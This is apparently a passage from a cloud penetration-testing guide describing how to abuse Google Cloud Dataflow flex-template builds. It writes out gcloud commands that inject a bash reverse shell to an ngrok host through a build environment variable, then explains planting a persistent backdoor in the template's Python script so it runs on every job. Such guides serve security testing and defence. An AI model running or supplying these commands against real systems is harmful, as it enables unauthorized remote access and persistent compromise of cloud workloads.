gitclonehttps://github.com/GoogleCloudPlatform/python-docs-samples.gitcdpython-docs-samples/dataflow/flex-templates/getting_started# Create repository where dockerfiles and code is going to be storedexport REPOSITORY=flex-example-pythongcloudstoragebucketscreategs://$REPOSITORY# Create artifact storageexport NAME_ARTIFACT=flex-example-pythongcloudartifactsrepositoriescreate $NAME_ARTIFACT \--repository-format=docker \--location=us-central1gcloudauthconfigure-dockerus-central1-docker.pkg.dev# Create templateexport NAME_TEMPLATE=flex-templategclouddataflow $NAME_TEMPLATE buildgs://$REPOSITORY/getting_started-py.json \--image-gcr-path"us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \--sdk-language"PYTHON" \--flex-template-base-image"PYTHON3" \--metadata-file"metadata.json" \--py-path"." \--env"FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \--env"FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \--env"PYTHONWARNINGS=all:0:antigravity.x:0:0" \--env"/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \--region=us-central1
While it's building, you will get a reverse shell (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to go to the /template directory and modify the code of the main python script that will be executed (in our example this is getting_started.py). Set your backdoor here so everytime the job is executed, it'll execute it.
Then, next time the job is executed, the compromised container built will be run:
# Run templategclouddataflow $NAME_TEMPLATE runtesting \--template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \--parameters=output="gs://$REPOSITORY/out" \--region=us-central1